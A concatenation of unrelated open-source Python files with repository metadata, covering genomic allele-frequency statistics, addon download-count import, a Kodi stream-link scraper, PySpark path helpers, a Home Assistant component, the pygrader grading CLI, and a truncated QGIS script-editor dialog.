alleleCount += 2
alleleCountPerTumorDict[sourceElementId][projectCode] += 2
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 2
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# c) possibility would be missing allele (./.)
## B) Insertion in reference genome and absent in donor genome
elif (MEIObj.ref == "<MEI>"):
# print "Insertion in reference genome", donorId, genotype, projectCode
# a) Heterozygous
if (genotype == "0/1"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 1
alleleCountPerTumorDict[sourceElementId][projectCode] += 1
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 1
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# b) Homozygous reference
elif (genotype == "0/0"):
# print "ancestryCode: ", ancestryCode
nbSourceElementsDict[ancestryCode][donorId] += 1
alleleCount += 2
alleleCountPerTumorDict[sourceElementId][projectCode] += 2
alleleCountPerAncestryDict[sourceElementId][ancestryCode] += 2
# print "alleleCount: ", alleleCount
# print "alleleCount-ProjectCode: ", alleleCountPerTumorDict[sourceElementId][projectCode]
# print "alleleCount-ancestry: ", alleleCountPerAncestryDict[sourceElementId][ancestryCode]
# c) possibility would be missing allele (./.)
## C) Raise error...
else:
msg="Incorrectly formated VCF line"
info(msg)
## Compute global variant allele frequency (VAF)
alleleFrequency = float(alleleCount) / totalNbChrom
# Save VAF a dictionary. One per MEI type
globalAlleleFreqDict[sourceElementId] = alleleFrequency
# Write source element allele count and frequency in the output table
chrom = MEIObj.chrom
pos = MEIObj.pos
element = MEIObj.infoDict["CLASS"]
row = sourceElementId + "\t" + str(alleleCount) + "\t" + str(alleleFrequency) + "\n"
outFile.write(row)
## Compute source element variant allele frequency across ancestries
for ancestryCode in alleleCountPerAncestryDict[sourceElementId]:
totalAlleleCountAncestry = ancestryTotalAlleleCountDict[ancestryCode]
alleleCountInAncestry = alleleCountPerAncestryDict[sourceElementId][ancestryCode]
alleleFreqInAncestry = float(alleleCountInAncestry) / totalAlleleCountAncestry
print "test: ", sourceElementId, ancestryCode, totalAlleleCountAncestry, alleleCountInAncestry, alleleFreqInAncestry
alleleFreqPerAncestryDict[sourceElementId][ancestryCode] = alleleFreqInAncestry
print "---------------------"
print "Finished-dict1: ", alleleCountPerTumorDict
print "Finished-dict2: ", alleleCountPerAncestryDict
print "Finished-dict3: ", alleleFreqPerAncestryDict
#### 4. Make tables:
####################
### 4.1 Source element allele count per tumor type
# Create pandas dataframe from dictionary
df=pd.DataFrame(alleleCountPerTumorDict)
# transpose dictionary to have source elements as rows and tumor types as columns
df=df.T
# Save output into tsv
outFilePath = outDir + '/germline_source_element_alleleCount_perTumorType.tsv'
df.to_csv(outFilePath, sep='\t')
### 4.2 Source element allele count per tumor type
# Create pandas dataframe from dictionary
df=pd.DataFrame(alleleCountPerTumorDict)
# transpose dictionary to have source elements as rows and tumor types as columns
df=df.T
# Save output into tsv
outFilePath = outDir + '/germline_source_element_alleleCount_perTumorType.tsv'
df.to_csv(outFilePath, sep='\t')
### 4.3 Source element allele frequency per ancestry
# Create pandas dataframe from dictionary
df=pd.DataFrame(alleleFreqPerAncestryDict)
# transpose dictionary to have source elements as rows and tumor types as columns
df=df.T
# Save output into tsv
outFilePath = outDir + '/germline_source_element_alleleFreq_perAncestry.tsv'
df.to_csv(outFilePath, sep='\t')
#### 5. Make plots:
###################
header("5. Make plots")
# - Variant allele frequencies histogram across PCAWG donors
# - Number of source elements per donor and ancestry. Boxplot
# - Number of source elements per donor and ancestry. Violin Plot
#### 5.1 Source element variant allele frequencies across PCAWG donors
header("5.1 Make variant allele frequencies plot")
alleleFreqList = globalAlleleFreqDict.values()
fig = plt.figure(figsize=(5,6))
fig.suptitle('Variant allele frequencies (VAF)', fontsize=14)
## Make plot
ax1 = fig.add_subplot(1, 1, 1)
plt.hist(alleleFreqList, bins=10, color='#008000', alpha=0.75)
plt.xlabel("VAF", fontsize=14)
plt.ylabel("# L1 source elements", fontsize=12)
plt.xlim(0, 1)
# Remove top and right axes
ax1.get_xaxis().tick_bottom()
ax1.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax1.set_axisbelow(True)
## Customize ticks
plt.xticks(np.arange(0, 1.01, 0.1))
locs, labels = plt.xticks()
# plt.setp(labels, rotation=30)
## Save figure
fileName = outDir + "/germline_source_element_VAF_hist.pdf"
plt.savefig(fileName)
#### 5.2 Number of source elements per donor and ancestry
header("5.2 Number of source elements per donor and ancestry")
### A) Boxplot
## Organize the data for plotting
tupleListNbSourceElements = []
for ancestryCode in sorted(nbSourceElementsDict):
# Make tuple (ancestryCode, list with number of source elements per donor)
nbDonors= len(nbSourceElementsDict[ancestryCode].values())
xLabel = ancestryCode + '(' + str(nbDonors) + ')'
nbSourceElementsTuple = (xLabel, nbSourceElementsDict[ancestryCode].values())
# Add tuple to the list
tupleListNbSourceElements.append(nbSourceElementsTuple)
## Make nested list with the following format:
# [donor1_nbSourceElements, donor2_nbSourceElements, ..., donorN_nbSourceElements], [donor1_nbSourceElements, donor2_nbSourceElements, ..., donorN_nbSourceElements] , ... [donor1_nbSourceElements, donor2_nbSourceElements, ..., donorN_nbSourceElements]
# ancestry1_list ancestry2_list ancestryN_list
tmpList = map(list, zip(*tupleListNbSourceElements))
ancestryCodesList = tmpList[0]
nbSourceElementsPerDonor = tmpList[1]
### Plotting
fig = plt.figure(figsize=(5,6))
fig.suptitle('# Source elements per donor', fontsize=14)
ax1 = fig.add_subplot(1, 1, 1)
# Create the boxplot
bp = ax1.boxplot(nbSourceElementsPerDonor)
plt.ylabel("# Source L1", fontsize=12)
## Customize boxplot:
# change outline color, fill color and linewidth of the boxes
for box in bp['boxes']:
# change outline color
box.set( color='#696969', linewidth=1)
# change color and linewidth of the whiskers
for whisker in bp['whiskers']:
whisker.set(color='#696969', linewidth=1)
# change color and linewidth of the caps
for cap in bp['caps']:
cap.set(color='#696969', linewidth=1)
# change color and linewidth of the medians
for median in bp['medians']:
median.set(color='#8b0000', linewidth=2)
# Add the ancestry codes to the x-axis
ax1.set_xticklabels(ancestryCodesList, fontsize = 10)
locs, labels = plt.xticks()
# plt.setp(labels, rotation=25)
# Remove top and right axes
ax1.get_xaxis().tick_bottom()
ax1.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax1.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax1.set_axisbelow(True)
## Save figure
fileName = outDir + "/nb_germline_source_element_perDonor_boxplot.pdf"
fig.savefig(fileName)
### B) Violin plot
## Organize the data for plotting into a dictionary:
# - dict1:
# nbSourceElements -> list[nbSourceElementsDonor1, nbSourceElementsDonor2, ..., nbSourceElementsDonorN]
# ancestryPerDonor -> list[ancestryDonor1, ancestryDonor2, ..., nbSourceElementsDonorN]
dict4pandas = {}
dict4pandas['nbSourceElements'] = []
dict4pandas['ancestry'] = []
for ancestryCode in sorted(nbSourceElementsDict):
nbSourceElementsPerDonorList = nbSourceElementsDict[ancestryCode].values()
nbDonors = len(nbSourceElementsPerDonorList)
xLabel = ancestryCode + '(' + str(nbDonors) + ')'
xLabelList = [ xLabel ] * nbDonors
dict4pandas['nbSourceElements'] = dict4pandas['nbSourceElements'] + nbSourceElementsPerDonorList
dict4pandas['ancestry'] = dict4pandas['ancestry'] + xLabelList
# Make pandas dataframe from dict:
dataframe = pd.DataFrame(dict4pandas)
### Plotting
fig = plt.figure(figsize=(5,6))
fig.suptitle('# Source elements per donor', fontsize=14)
# Create the violin plot
ax = sns.violinplot(x='ancestry', y='nbSourceElements', data=dataframe, palette="muted")
# y limit
#sns.plt.ylim(0,21)
## Modify axis labels
ax.set(xlabel='', ylabel='# Source L1')
# Remove top and right axes
ax.get_xaxis().tick_bottom()
ax.get_yaxis().tick_left()
# Add a horizontal grid to the plot, but make it very light in color
# so we can use it for reading data values but not be distracting
ax.yaxis.grid(True, linestyle='-', which='major', color='lightgrey', alpha=0.5)
ax.set_axisbelow(True)
## Save figure
fileName = outDir + "/nb_germline_source_element_perDonor_violinPlot.pdf"
fig.savefig(fileName)
####
header("Finished")
| brguez/TEIBA | src/python/sourceElements.stats.py | Python | gpl-3.0 | 18,064 |
import codecs
from datetime import datetime, timedelta
from optparse import make_option
from os import path, unlink
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
import olympia.core.logger
from olympia.addons.models import Addon
from olympia.files.models import File
from olympia.stats.models import update_inc, DownloadCount
from olympia.zadmin.models import DownloadSource
from . import get_date_from_file, save_stats_to_file
log = olympia.core.logger.getLogger('adi.downloadcountsfromfile')
def is_valid_source(src, fulls, prefixes):
"""Return True if the source is valid.
A source is valid if it is in the list of valid full sources or prefixed by
a prefix in the list of valid prefix sources.
"""
return src in fulls or any(p in src for p in prefixes)
class Command(BaseCommand):
"""Update download count metrics from a file in the database.
Usage:
./manage.py download_counts_from_file <folder> --date=YYYY-MM-DD
If no date is specified, the default is the day before.
If not folder is specified, the default is `hive_results/YYYY-MM-DD/`.
This folder will be located in `<settings.NETAPP_STORAGE>/tmp`.
We get a row for each "addon download" request, in this format:
<count> <file id or add-on id or add-on slug> <click source>
We insert one DownloadCount entry per addon per day, and each row holds
the json-ified dict of click sources/counters.
Eg, for the above request:
date: <the date of the day the queries were made>
count: <the number of requests for this addon, for this day>
addon: <the addon that has this id>
src: {'dp-btn-primary': 1}
"""
help = __doc__
option_list = BaseCommand.option_list + (
make_option('--date', action='store', type='string',
dest='date', help='Date in the YYYY-MM-DD format.'),
make_option('--separator', action='store', type='string', default='\t',
dest='separator', help='Field separator in file.'),
)
def handle(self, *args, **options):
start = datetime.now() # Measure the time it takes to run the script.
day = options['date']
if not day:
day = (datetime.now() - timedelta(days=1)).strftime('%Y-%m-%d')
folder = args[0] if args else 'hive_results'
folder = path.join(settings.TMP_PATH, folder, day)
sep = options['separator']
filepath = path.join(folder, 'download_counts.hive')
# Make sure we're not trying to update with mismatched data.
if get_date_from_file(filepath, sep) != day:
raise CommandError('%s file contains data for another day' %
filepath)
# First, make sure we don't have any existing counts for the same day,
# or it would just increment again the same data.
DownloadCount.objects.filter(date=day).delete()
# Memoize the files to addon relations and the DownloadCounts.
download_counts = {}
# Perf: preload all the files and slugs once and for all.
# This builds two dicts:
# - One where each key (the file_id we get from the hive query) has
# the addon_id as value.
# - One where each key (the add-on slug) has the add-on_id as value.
files_to_addon = dict(File.objects.values_list('id',
'version__addon_id'))
slugs_to_addon = dict(Addon.objects.public().values_list('slug', 'id'))
# Only accept valid sources, which are listed in the DownloadSource
# model. The source must either be exactly one of the "full" valid
# sources, or prefixed by one of the "prefix" valid sources.
fulls = set(DownloadSource.objects.filter(type='full').values_list(
'name', flat=True))
prefixes = DownloadSource.objects.filter(type='prefix').values_list(
'name', flat=True)
with codecs.open(filepath, encoding='utf8') as count_file:
for index, line in enumerate(count_file):
if index and (index % 1000000) == 0:
log.info('Processed %s lines' % index)
splitted = line[:-1].split(sep)
if len(splitted) != 4:
log.debug('Badly formatted row: %s' % line)
continue
day, counter, id_or_slug, src = splitted
try:
# Clean up data.
id_or_slug = id_or_slug.strip()
counter = int(counter)
except ValueError:
# Ignore completely invalid data.
continue
if id_or_slug.strip().isdigit():
# If it's a digit, then it should be a file id.
try:
id_or_slug = int(id_or_slug)
except ValueError:
continue
# Does this file exist?
if id_or_slug in files_to_addon:
addon_id = files_to_addon[id_or_slug]
# Maybe it's an add-on ?
elif id_or_slug in files_to_addon.values():
addon_id = id_or_slug
else:
# It's an integer we don't recognize, ignore the row.
continue
else:
# It's probably a slug.
if id_or_slug in slugs_to_addon:
addon_id = slugs_to_addon[id_or_slug]
else:
# We've exhausted all possibilities, ignore this row.
continue
if not is_valid_source(src, fulls=fulls, prefixes=prefixes):
continue
# Memoize the DownloadCount.
if addon_id in download_counts:
dc = download_counts[addon_id]
else:
dc = DownloadCount(date=day, addon_id=addon_id, count=0)
download_counts[addon_id] = dc
# We can now fill the DownloadCount object.
dc.count += counter
dc.sources = update_inc(dc.sources, src, counter)
# Create in bulk: this is much faster.
DownloadCount.objects.bulk_create(download_counts.values(), 100)
for download_count in download_counts.values():
save_stats_to_file(download_count)
log.info('Processed a total of %s lines' % (index + 1))
log.debug('Total processing time: %s' % (datetime.now() - start))
# Clean up file.
log.debug('Deleting {path}'.format(path=filepath))
unlink(filepath)
| harikishen/addons-server | src/olympia/stats/management/commands/download_counts_from_file.py | Python | bsd-3-clause | 6,839 |
#!/usr/bin/python3
# Copyright (c) 2015 Davide Gessa
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from libcontractvm import Wallet, WalletExplorer, ConsensusManager
from forum import ForumManager
import sys
import time
consMan = ConsensusManager.ConsensusManager ()
consMan.bootstrap ("http://127.0.0.1:8181")
wallet = WalletExplorer.WalletExplorer (wallet_file='test.wallet')
srMan = ForumManager.ForumManager (consMan, wallet=wallet)
while True:
pollid = input ('Insert the id of the poll: ')
choice = input ('Insert the choice for the poll: ')
try:
print ('Broadcasted:', srMan.vote (pollid, choice))
except:
print ('Error.')
| andreasscalas/dappforum | samples/vote.py | Python | mit | 734 |
# -*- coding: UTF-8 -*-
#######################################################################
# ----------------------------------------------------------------------------
# "THE BEER-WARE LICENSE" (Revision 42):
# @Daddy_Blamo wrote this file. As long as you retain this notice you
# can do whatever you want with this stuff. If we meet some day, and you think
# this stuff is worth it, you can buy me a beer in return. - Muad'Dib
# ----------------------------------------------------------------------------
#######################################################################
# Addon Name: Placenta
# Addon id: plugin.video.placenta
# Addon Provider: Mr.Blamo
import re
import urllib
import urlparse
from resources.lib.modules import cleantitle
from resources.lib.modules import client
from resources.lib.modules import source_utils
from resources.lib.modules import dom_parser
class source:
def __init__(self):
self.priority = 1
self.language = ['de']
self.domains = ['kinoking.to']
self.base_link = 'https://kinoking.to'
self.search_link = '/?s=%s'
self.get_link = '/links/%s'
def movie(self, imdb, title, localtitle, aliases, year):
try:
url = self.__search([localtitle] + source_utils.aliases_to_array(aliases))
if not url and title != localtitle: url = self.__search([title] + source_utils.aliases_to_array(aliases))
return url
except:
return
def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):
try:
url = self.__search([localtvshowtitle] + source_utils.aliases_to_array(aliases))
if not url and tvshowtitle != localtvshowtitle: url = self.__search([tvshowtitle] + source_utils.aliases_to_array(aliases))
return url
except:
return
def episode(self, url, imdb, tvdb, title, premiered, season, episode):
try:
if not url:
return
s = '-%sx%s/' % (season, episode)
url = url.rstrip('/')
url = url + s
url = urlparse.urljoin(self.base_link, url)
return url
except:
return
def sources(self, url, hostDict, hostprDict):
sources = []
try:
if not url:
return sources
query = urlparse.urljoin(self.base_link, url)
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'id': 'downloads'})
r = dom_parser.parse_dom(r, 'table')
r = dom_parser.parse_dom(r, 'tbody')
r = dom_parser.parse_dom(r, 'tr')
for i in r:
if re.search('German', i[1]):
hoster = re.search('(?<=domain=)(.*?)(?=\")', i[1])
hoster = hoster.group().lower()
valid, hoster = source_utils.is_host_valid(hoster, hostDict)
if not valid: continue
link = re.search('(?<=links/)(.*?)(?=/)', i[1])
link = link.group()
if re.search('<td>HD</td>', i[1]):
quality = 'HD'
else:
quality = 'SD'
url = self.__get_link(link)
sources.append({'source': hoster, 'quality': quality, 'language': 'de', 'url': url, 'direct': False, 'debridonly': False})
return sources
except:
return sources
def resolve(self, url):
return url
def __search(self, titles):
try:
query = self.search_link % (urllib.quote_plus(cleantitle.query(titles[0])))
query = urlparse.urljoin(self.base_link, query)
t = [cleantitle.get(i) for i in set(titles) if i]
r = client.request(query)
r = dom_parser.parse_dom(r, 'article')
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'title'})
r = dom_parser.parse_dom(r, 'a', req='href')
for i in r:
title = client.replaceHTMLCodes(r[0][1])
title = cleantitle.get(title)
if title in t:
return source_utils.strip_domain(i[0]['href'])
return
except:
return
def __get_link(self, link):
try:
if not link:
return
query = self.get_link % link
query = urlparse.urljoin(self.base_link, query)
r = client.request(query)
r = dom_parser.parse_dom(r, 'div', attrs={'class': 'boton'})
r = dom_parser.parse_dom(r, 'a', req='href')
r = r[0].attrs['href']
return r
except:
return | RuiNascimento/krepo | script.module.lambdascrapers/lib/lambdascrapers/sources_ lambdascrapers/de/kinoking.py | Python | gpl-2.0 | 4,845 |
"""
Utils function.
"""
import sys
import os
import logging
from glob import glob
def add_pyspark_path_if_needed():
"""Add PySpark to the library path based on the value of SPARK_HOME if
pyspark is not already in our path"""
try:
from pyspark import context
except ImportError:
# We need to add PySpark, try findspark if we can but it has an
# undeclared IPython dep.
try:
import findspark
findspark.init()
except ImportError:
add_pyspark_path()
def add_pyspark_path():
"""Add PySpark to the library path based on the value of SPARK_HOME."""
try:
spark_home = os.environ['SPARK_HOME']
sys.path.append(os.path.join(spark_home, 'python'))
py4j_src_zip = glob(os.path.join(spark_home, 'python',
'lib', 'py4j-*-src.zip'))
if len(py4j_src_zip) == 0:
raise ValueError('py4j source archive not found in %s'
% os.path.join(spark_home, 'python', 'lib'))
else:
py4j_src_zip = sorted(py4j_src_zip)[::-1]
sys.path.append(py4j_src_zip[0])
except KeyError:
print("""SPARK_HOME was not set. please set it. e.g.
SPARK_HOME='/home/...' ./bin/pyspark [program]""")
exit(-1)
except ValueError as e:
print(str(e))
exit(-1)
def quiet_py4j():
logger = logging.getLogger('py4j')
logger.setLevel(logging.INFO)
| eyeem/spark-testing-base | python/sparktestingbase/utils.py | Python | apache-2.0 | 1,497 |
"""The Unify Circuit component."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_NAME, CONF_URL
from homeassistant.helpers import config_validation as cv, discovery
_LOGGER = logging.getLogger(__name__)
DOMAIN = "circuit"
CONF_WEBHOOK = "webhook"
WEBHOOK_SCHEMA = vol.Schema(
{vol.Optional(CONF_NAME): cv.string, vol.Required(CONF_URL): cv.string}
)
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{vol.Required(CONF_WEBHOOK): vol.All(cv.ensure_list, [WEBHOOK_SCHEMA])}
)
},
extra=vol.ALLOW_EXTRA,
)
async def async_setup(hass, config):
"""Set up the Unify Circuit component."""
webhooks = config[DOMAIN][CONF_WEBHOOK]
for webhook_conf in webhooks:
hass.async_create_task(
discovery.async_load_platform(hass, "notify", DOMAIN, webhook_conf, config)
)
return True
| tchellomello/home-assistant | homeassistant/components/circuit/__init__.py | Python | apache-2.0 | 895 |
#!/usr/bin/env python3
#
# Copyright (C) 2012 W. Trevor King <wking@tremily.us>
#
# This file is part of pygrader.
#
# pygrader is free software: you can redistribute it and/or modify it under the
# terms of the GNU General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any later
# version.
#
# pygrader is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along with
# pygrader. If not, see <http://www.gnu.org/licenses/>.
"""Manage grades from the command line
"""
import configparser as _configparser
from email.mime.text import MIMEText as _MIMEText
import email.utils as _email_utils
import inspect as _inspect
import logging as _logging
import logging.handlers as _logging_handlers
import os.path as _os_path
import sys as _sys
import pgp_mime as _pgp_mime
import pygrader as _pygrader
from pygrader import __version__
from pygrader import LOG as _LOG
from pygrader import color as _color
from pygrader.email import test_smtp as _test_smtp
from pygrader.email import Responder as _Responder
from pygrader.mailpipe import mailpipe as _mailpipe
from pygrader.storage import initialize as _initialize
from pygrader.storage import load_course as _load_course
from pygrader.tabulate import tabulate as _tabulate
from pygrader.template import assignment_email as _assignment_email
from pygrader.template import course_email as _course_email
from pygrader.template import student_email as _student_email
from pygrader.todo import print_todo as _todo
if __name__ == '__main__':
from argparse import ArgumentParser as _ArgumentParser
parser = _ArgumentParser(description=__doc__)
parser.add_argument(
'-v', '--version', action='version',
version='%(prog)s {}'.format(_pgp_mime.__version__))
parser.add_argument(
'-d', '--base-dir', dest='basedir', default='.',
help='Base directory containing grade data')
parser.add_argument(
'-e', '--encoding', dest='encoding', default='utf-8',
help=('Override the default file encoding selection '
'(useful when running from procmail)'))
parser.add_argument(
'-c', '--color', default=False, action='store_const', const=True,
help='Color printed output with ANSI escape sequences')
parser.add_argument(
'-V', '--verbose', default=0, action='count',
help='Increase verbosity')
parser.add_argument(
'-s', '--syslog', default=False, action='store_const', const=True,
help='Log to syslog (rather than stderr)')
subparsers = parser.add_subparsers(title='commands')
smtp_parser = subparsers.add_parser(
'smtp', help=_test_smtp.__doc__.splitlines()[0])
smtp_parser.set_defaults(func=_test_smtp)
smtp_parser.add_argument(
'-a', '--author',
help='Your address (email author)')
smtp_parser.add_argument(
'-t', '--target', dest='targets', action='append',
help='Address for the email recipient')
initialize_parser = subparsers.add_parser(
'initialize', help=_initialize.__doc__.splitlines()[0])
initialize_parser.set_defaults(func=_initialize)
initialize_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
tabulate_parser = subparsers.add_parser(
'tabulate', help=_tabulate.__doc__.splitlines()[0])
tabulate_parser.set_defaults(func=_tabulate)
tabulate_parser.add_argument(
'-s', '--statistics', default=False, action='store_const', const=True,
help='Calculate mean and standard deviation for each assignment')
email_parser = subparsers.add_parser(
'email', help='Send emails containing grade information')
email_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
email_parser.add_argument(
'-a', '--author',
help='Your name (email author), defaults to course robot')
email_parser.add_argument(
'--cc', action='append', help='People to carbon copy')
email_subparsers = email_parser.add_subparsers(title='type')
assignment_parser = email_subparsers.add_parser(
'assignment', help=_assignment_email.__doc__.splitlines()[0])
assignment_parser.set_defaults(func=_assignment_email)
assignment_parser.add_argument(
'assignment', help='Name of the target assignment')
student_parser = email_subparsers.add_parser(
'student', help=_student_email.__doc__.splitlines()[0])
student_parser.set_defaults(func=_student_email)
student_parser.add_argument(
'-o', '--old', default=False, action='store_const', const=True,
help='Include already-notified information in emails')
student_parser.add_argument(
'-s', '--student', dest='student',
help='Explicitly select the student to notify (instead of everyone)')
course_parser = email_subparsers.add_parser(
'course', help=_course_email.__doc__.splitlines()[0])
course_parser.set_defaults(func=_course_email)
course_parser.add_argument(
'-t', '--target', dest='targets', action='append',
help='Name, alias, or group for the email recipient(s)')
mailpipe_parser = subparsers.add_parser(
'mailpipe', help=_mailpipe.__doc__.splitlines()[0])
mailpipe_parser.set_defaults(func=_mailpipe)
mailpipe_parser.add_argument(
'-D', '--dry-run', default=False, action='store_const', const=True,
help="Don't actually send emails, create files, etc.")
mailpipe_parser.add_argument(
'-m', '--mailbox', choices=['maildir', 'mbox'],
help=('Instead of piping a message in via stdout, you can also read '
'directly from a mailbox. This option specifies the format of '
'your target mailbox.'))
mailpipe_parser.add_argument(
'-i', '--input', dest='input_', metavar='INPUT',
help='Path to the mailbox containing messages to be processed')
mailpipe_parser.add_argument(
'-o', '--output',
help=('Path to the mailbox that will recieve successfully processed '
'messages. If not given, successfully processed messages will '
'be left in the input mailbox'))
mailpipe_parser.add_argument(
'-l', '--max-late', default=0, type=float,
help=('Grace period in seconds before an incoming assignment is '
'actually marked as late'))
mailpipe_parser.add_argument(
'-r', '--respond', default=False, action='store_const', const=True,
help=('Send automatic response emails to acknowledge incoming '
'messages.'))
mailpipe_parser.add_argument(
'-t', '--trust-email-infrastructure',
default=False, action='store_const', const=True,
help=('Send automatic response emails even if the target has not '
'registered a PGP key.'))
mailpipe_parser.add_argument(
'-c', '--continue-after-invalid-message',
default=False, action='store_const', const=True,
help=('Send responses to invalid messages and continue processing '
'further emails (default is to die with an error message).'))
todo_parser = subparsers.add_parser(
'todo', help=_todo.__doc__.splitlines()[0])
todo_parser.set_defaults(func=_todo)
todo_parser.add_argument(
'source', help='Name of source file/directory')
todo_parser.add_argument(
'target', help='Name of target file/directory')
# p.add_option('-t', '--template', default=None)
args = parser.parse_args()
if not hasattr(args, 'func'):
# no command selected; print help and die
parser.print_help()
_sys.exit(0)
if args.verbose:
_LOG.setLevel(max(_logging.DEBUG, _LOG.level - 10*args.verbose))
_pgp_mime.LOG.setLevel(_LOG.level)
if args.syslog:
syslog = _logging_handlers.SysLogHandler(address="/dev/log")
syslog.setFormatter(_logging.Formatter('%(name)s: %(message)s'))
for handler in list(_LOG.handlers):
_LOG.removeHandler(handler)
_LOG.addHandler(syslog)
for handler in list(_pgp_mime.LOG.handlers):
_pgp_mime.LOG.removeHandler(handler)
_pgp_mime.LOG.addHandler(syslog)
_color.USE_COLOR = args.color
_pygrader.ENCODING = args.encoding
config = _configparser.ConfigParser()
config.read([
_os_path.expanduser(_os_path.join('~', '.config', 'smtplib.conf')),
], encoding=_pygrader.ENCODING)
func_args = _inspect.getargspec(args.func).args
kwargs = {}
if 'basedir' in func_args:
kwargs['basedir'] = args.basedir
if 'course' in func_args:
course = _load_course(basedir=args.basedir)
active_groups = course.active_groups()
kwargs['course'] = course
if hasattr(args, 'assignment'):
kwargs['assignment'] = course.assignment(name=args.assignment)
if hasattr(args, 'cc') and args.cc:
kwargs['cc'] = [course.person(name=cc) for cc in args.cc]
for attr in ['author', 'student']:
if hasattr(args, attr):
name = getattr(args, attr)
if name is None and attr == 'author':
kwargs[attr] = course.robot
else:
kwargs[attr] = course.person(name=name)
for attr in ['targets']:
if hasattr(args, attr):
people = getattr(args, attr)
if people is None:
people = ['professors'] # for the course email
kwargs[attr] = []
for person in people:
if person in active_groups:
kwargs[attr].extend(course.find_people(group=person))
else:
kwargs[attr].extend(course.find_people(name=person))
for attr in ['dry_run', 'mailbox', 'output', 'input_', 'max_late',
'old', 'statistics', 'trust_email_infrastructure',
'continue_after_invalid_message']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
elif args.func == _test_smtp:
for attr in ['author', 'targets']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
elif args.func == _todo:
for attr in ['source', 'target']:
if hasattr(args, attr):
kwargs[attr] = getattr(args, attr)
if 'use_color' in func_args:
kwargs['use_color'] = args.color
if ('smtp' in func_args and
not kwargs.get('dry_run', False) and
'smtp' in config.sections()):
params = _pgp_mime.get_smtp_params(config)
kwargs['smtp'] = _pgp_mime.get_smtp(*params)
del params
if hasattr(args, 'respond') and getattr(args, 'respond'):
kwargs['respond'] = _Responder(
smtp=kwargs.get('smtp', None),
dry_run=kwargs.get('dry_run', False))
_LOG.debug('execute {} with {}'.format(args.func, kwargs))
try:
ret = args.func(**kwargs)
finally:
smtp = kwargs.get('smtp', None)
if smtp:
_LOG.info('disconnect from SMTP server')
smtp.quit()
if ret is None:
ret = 0
_sys.exit(ret)
| wking/pygrader | bin/pg.py | Python | gpl-3.0 | 11,702 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
EditRScriptDialog.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from sextante.gui.ParametersDialog import ParametersDialog
from sextante.core.QGisLayers import QGisLayers
from sextante.modeler.Providers import Providers
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import sys
from PyQt4 import QtCore, QtGui
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from sextante.gui.HelpEditionDialog import HelpEditionDialog
import pickle
from sextante.r.RAlgorithm import RAlgorithm
from sextante.r.RUtils import RUtils
class EditRScriptDialog(QtGui.QDialog):
def __init__(self, alg):
self.alg = alg
if self.alg is not None:
self.filename = self.alg.descriptionFile
else:
self.filename = None
QtGui.QDialog.__init__(self)
self.setModal(False)
self.setupUi()
self.update = False
self.help = None
def setupUi(self):
self.resize(600,400)
self.setWindowTitle("Edit script")
layout = QVBoxLayout()
self.text = QtGui.QTextEdit()
self.text.setObjectName("text")
self.text.setEnabled(True)
self.buttonBox = QtGui.QDialogButtonBox()
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
if self.alg != None:
self.text.setText(self.alg.script)
self.editHelpButton = QtGui.QPushButton()
self.editHelpButton.setText("Edit script help")
self.buttonBox.addButton(self.editHelpButton, QtGui.QDialogButtonBox.ActionRole)
QObject.connect(self.editHelpButton, QtCore.SIGNAL("clicked()"), self.editHelp)
self.saveButton = QtGui.QPushButton()
self.saveButton.setText("Save")
self.buttonBox.addButton(self.saveButton, QtGui.QDialogButtonBox.ActionRole)
self.runButton = QtGui.QPushButton()
self.runButton.setText("Run")
self.buttonBox.addButton(self.runButton, QtGui.QDialogButtonBox.ActionRole)
self.closeButton = QtGui.QPushButton()
self.closeButton.setText("Close")
self.buttonBox.addButton(self.closeButton, QtGui.QDialogButtonBox.ActionRole)
QObject.connect(self.runButton, QtCore.SIGNAL("clicked()"), self.runAlgorithm)
QObject.connect(self.saveButton, QtCore.SIGNAL("clicked()"), self.saveAlgorithm)
QObject.connect(self.closeButton, QtCore.SIGNAL("clicked()"), self.cancelPressed)
layout.addWidget(self.text)
